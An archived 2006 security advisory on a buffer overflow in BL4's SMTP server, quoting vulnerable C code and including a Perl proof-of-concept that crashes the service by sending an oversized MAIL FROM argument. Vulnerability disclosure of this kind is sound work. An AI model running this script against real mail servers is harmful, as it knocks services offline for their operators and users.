TUCoPS :: HP Unsorted B :: b06-1910.htm

Bl4's smtp server bufferoverflow vulnerable
BL4's SMTP server BufferOverflow Vulnerable
BL4's SMTP server BufferOverflow Vulnerable

[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable

Author       : Dedi Dwianto
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High

Affected software description:

Application : BL4's SMTP server
version     : < 0.1.5
URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :

BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email.
The SMTP server puts the incoming email into various text files.


BL4's SMTP server is to a flaw that can allow remote attacker to
cause a denial of service or a attacker can Execution of Arbitrary Code.
The vulnerability is due to a buffer overflow in the SMTP service.
A remote attacker can repeatedly send more that 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.

                        slaveEmail[x]->isData = 0;
                        slaveEmail[x]->emailFrom = 0;
                        slaveEmail[x]->emailTo = 0;
                        buffer = malloc(sizeof(char) * 12);
                        sprintf(buffer, "250 OK\r\n");
                        return buffer;
                slaveEmail[x]->EHLO = buffer;
                slaveEmail[x]->EHLOtrue = 1;

                buffer = malloc(sizeof(char) * 12);
                sprintf(buffer, "250 OK\r\n");
                return buffer;
        sprintf(buffer, "250 OK\r\n");
        Vulnerable for format strings.

        buffer = malloc(sizeof(char) * 12);
        Vulnerable for buffer overflow.
A attacker can create Arbitrary Code here .



use IO::Socket;
use Socket;

my($socket) = "";

if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

        print " -- Connecting To SMTP server at $adr port $prt ... \n";


        print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";


        print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";

        printf("[+]Crash service.....\n");


sub usage()
 print "\n=========================================\r\n";
 print "     BL4's SMTP server Remote DOS \r\n";
 print "=========================================\r\n";
 print "       Bug Found by Dedi Dwianto \r\n";
print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "      Echo Security Research Group \r\n";
 print "=========================================\r\n";
 print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";


~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH